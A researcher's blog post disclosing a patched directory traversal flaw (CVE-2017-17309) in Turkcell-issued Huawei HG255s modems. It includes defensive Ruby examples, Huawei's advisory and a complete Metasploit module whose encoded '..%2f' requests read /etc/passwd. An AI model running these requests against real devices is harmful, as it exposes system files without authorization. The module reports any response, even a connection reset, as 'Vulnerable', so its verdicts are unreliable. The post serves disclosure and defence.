I would like to talk about a vulnerability that we discovered some time ago. I am reposting this security research so that it also lives on my blog. The affected product belongs to Turkcell, a domestic internet infrastructure provider in Turkey, which handed this modem to its internet subscribers as the standard modem; that is why we can say that millions of people use it. In addition, Huawei developed this product specifically for Turkcell. So consider the possibility of a cyber attack against a single product used across a whole country. Fortunately, we, as well-meaning security researchers, reported the situation. When we did security research on this product, we noticed the directory traversal vulnerability and reported it. I even developed a Metasploit module for this vulnerability.
Directory traversal, also known as “file path traversal” or “dot dot slash,” is a vulnerability that allows an attacker to access files and directories that are stored outside the root directory of a web application. This vulnerability occurs when the web application does not properly validate user input, allowing an attacker to manipulate the file path to access files and directories that are outside the root directory.
For example, consider a web application that allows users to upload images to a “photos” directory. If the web application does not properly validate the file path of the uploaded image, an attacker could potentially upload an image with a malicious file path such as “../../etc/passwd” in an attempt to access the system’s password file. This type of attack is possible because the “../” sequence in the file path tells the web application to go up one directory level. By using multiple “../” sequences, an attacker can traverse up multiple levels and potentially access sensitive files and directories that are stored outside the root directory of the web application.
To prevent directory traversal vulnerabilities, web developers must validate and sanitize user input so that it can never be used to build a file path that escapes the intended directory. This can be done with techniques such as input validation, allow-listing (whitelisting) of permitted file names, and canonicalizing the path before checking that it still lies under the web root. It is also important to secure the file system itself by setting appropriate permissions on sensitive files and directories, so that a traversal bug in the web application does not automatically expose them.
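The following is an added example, not code from the original post or from the affected firmware. It contrasts a naive path join with a hardened resolver in Ruby, and it uses the same encoded "..%2f" form that appears in the requests later in this post. The web root "/srv/www" is a hypothetical value chosen for the example.

```ruby
# Added example (not from the original post): safe resolution of a requested
# path against a web root. WEB_ROOT is a hypothetical document root.
WEB_ROOT = '/srv/www'

# Decode %XX sequences once. A hand-rolled decoder is used so that '+' is not
# turned into a space, as form-decoding helpers would do.
def percent_decode(s)
  s.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# Vulnerable pattern: decode and concatenate onto the root with no check on
# where the result lands. The kernel resolves the ".." components, so the
# returned path is the file that open(2) would actually read.
def vulnerable_target(request_path)
  decoded = percent_decode(request_path)
  File.expand_path(File.join(WEB_ROOT, decoded))
end

# Hardened pattern: decode once, canonicalize with File.expand_path, then
# require the result to stay inside WEB_ROOT. Returns nil for anything that
# escapes, for a second layer of encoding (e.g. %252f), for NUL bytes, and for
# leading '~' (which File.expand_path would treat as a home directory).
def resolve_safe(request_path)
  decoded = percent_decode(request_path)
  return nil if decoded.include?('%') || decoded.include?("\0")
  relative = decoded.sub(%r{\A/+}, '')
  return nil if relative.start_with?('~')
  root = File.expand_path(WEB_ROOT)
  candidate = File.expand_path(relative, root)
  return nil unless candidate == root || candidate.start_with?(root + '/')
  candidate
end

if __FILE__ == $PROGRAM_NAME
  probe = '/js/..%2f..%2f..%2f..%2fetc/passwd'
  puts "naive join opens:  #{vulnerable_target(probe)}"
  puts "hardened resolver: #{resolve_safe(probe).inspect}"
  puts "normal request:    #{resolve_safe('/js/app.js')}"
end
```

Note that a request such as "/css/../js/app.js" is still accepted by the hardened resolver, because after canonicalization it stays under the root; the check is on the final location, not on the presence of "..", which is what makes it robust against encoding tricks.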
What was the cause of the security vulnerability?
When you examine the Metasploit module below, you can see that four different static-content directories are affected by this vulnerability:
'/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
'/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
'/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
'/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
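For anyone on the defending side, the four request patterns above are easy to spot in web-server access logs. The following is an added example, not part of the original post: a small Ruby scanner that percent-decodes each request path (including double-encoded variants), counts how far the path climbs above the document root, and reports the hits together with the HTTP status, since a 200 on such a path is the signal that the traversal actually succeeded. The log lines are constructed for the example and are not real modem logs.

```ruby
# Added example (not from the original post): flag traversal attempts in
# combined-format access logs. SAMPLE_LOG is constructed for this example.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [11/Sep/2017:10:00:01 +0300] "GET /js/main.js HTTP/1.1" 200 1532
  192.0.2.10 - - [11/Sep/2017:10:00:02 +0300] "GET /js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1126
  192.0.2.11 - - [11/Sep/2017:10:00:03 +0300] "GET /css/..%252f..%252fetc/passwd HTTP/1.1" 404 221
  192.0.2.12 - - [11/Sep/2017:10:00:04 +0300] "GET /res/logo.png HTTP/1.1" 200 8821
  192.0.2.13 - - [11/Sep/2017:10:00:05 +0300] "GET /lib/../lib/util.js HTTP/1.1" 200 912
LOG

REQUEST_RE = %r{"(?<method>[A-Z]+) (?<path>\S+) HTTP/[\d.]+" (?<status>\d{3})}

def percent_decode(s)
  s.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# Decode repeatedly (bounded) so that double encoding such as %252f cannot
# hide the dot-dot-slash from the check.
def decode_fully(path, rounds = 3)
  rounds.times do
    decoded = percent_decode(path)
    break if decoded == path
    path = decoded
  end
  path
end

# Walk the path segments and return the lowest directory depth reached
# relative to the root. A negative value means the request tried to climb
# above the document root; "/lib/../lib/x" never goes below 0 and is benign.
def min_depth(path)
  depth = 0
  lowest = 0
  path.split(%r{[\\/]+}).each do |seg|
    case seg
    when '', '.'
      next
    when '..'
      depth -= 1
      lowest = depth if depth < lowest
    else
      depth += 1
    end
  end
  lowest
end

# Return one hash per suspicious request: client IP, raw path, decoded path
# and the status code the server answered with.
def scan_access_log(text)
  hits = []
  text.each_line do |line|
    m = REQUEST_RE.match(line)
    next unless m
    decoded = decode_fully(m[:path].split('?', 2).first)
    next unless min_depth(decoded) < 0
    hits << { ip: line.split(' ', 2).first, path: m[:path],
              decoded: decoded, status: m[:status].to_i }
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each do |h|
    flag = h[:status] == 200 ? 'SUCCEEDED' : 'attempted'
    puts "#{flag} traversal from #{h[:ip]}: #{h[:path]} -> #{h[:decoded]}"
  end
end
```

The depth-counting check is deliberately applied to the decoded path rather than to the raw request string, so the same logic catches "..%2f", "..%252f" and plain "../" forms, while a path that dips into a subdirectory and back out again is not reported.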
The article that Huawei has published for us:
Huawei noticed that security researcher Ahmet Mersin revealed a directory traversal vulnerability in Huawei HG255s. Before this, security researchers Barış Çağrı Yıldırım, Ahmet Mersin and Ismail Tasdelen had sent the vulnerability to Huawei PSIRT. Huawei immediately launched a thorough investigation.
Huawei has finished the investigation. Huawei HG255s is affected by this vulnerability (CVE-2017-17309) and Huawei has already provided a fix solution to the affected carrier. The carrier has released a fixed version. The affected products will receive a system update prompt and users can install the update to fix the vulnerability.
We express our appreciation for Barış Çağrı Yıldırım, Ahmet Mersin and Ismail Tasdelen’s concerns on Huawei products.
PoC Video :
CVSS Score :
Base Score: 7.5 HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Metasploit Code :
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => 'Huawei HG255 Directory Traversal',
      'Description' => 'Server Directory Traversal at Huawei HG255 by malicious GET requests',
      'Author'      => 'Ismail Tasdelen',
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2017-17309'],
          ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
        ]
    )

    register_options(
      [
        Opt::RPORT(80)
      ], self.class
    )
  end

  def run
    # The four static-content prefixes under which the traversal was observed
    urllist = [
      '/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
      '/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
      '/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
      '/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
    ]

    urllist.each do |url|
      begin
        # send_request_raw leaves the %2f sequences as-is rather than normalising them
        res = send_request_raw(
          {
            'method' => 'GET',
            'uri'    => url
          })
        if res
          print_good("Vulnerable! for #{url}")
        else
          print_status("Vulnerable(no response) detected for #{url}")
        end
      rescue Errno::ECONNRESET
        print_status("Vulnerable(rst) detected for #{url}")
      rescue Exception
        print_error("Connection failed.")
      end
    end
  end
end
Revision History :
2018-06-06 V1.1 Updated: Update the security notice description information
2017-09-11 V1.0 INITIAL
Letter of Thanks :